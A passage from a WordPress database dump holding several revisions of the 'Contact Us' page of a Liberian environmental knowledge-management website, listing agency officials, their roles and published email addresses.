href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 12:11:23','2021-01-18 12:11:23','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3340,42,'2021-01-18 12:23:05','2021-01-18 12:23:05','','','','inherit','open','closed','','francis-2','','','2021-01-18 12:23:14','2021-01-18 12:23:14','',80,'https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png',0,'attachment','image/png',0),(3341,42,'2021-01-18 12:24:22','2021-01-18 12:24:22','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 12:24:22','2021-01-18 12:24:22','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3342,42,'2021-01-18 12:24:22','2021-01-18 12:24:22','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 12:24:22','2021-01-18 12:24:22','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3343,42,'2021-01-18 12:24:22','2021-01-18 12:24:22','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 12:24:22','2021-01-18 12:24:22','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3344,42,'2021-01-18 12:30:27','2021-01-18 12:30:27','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 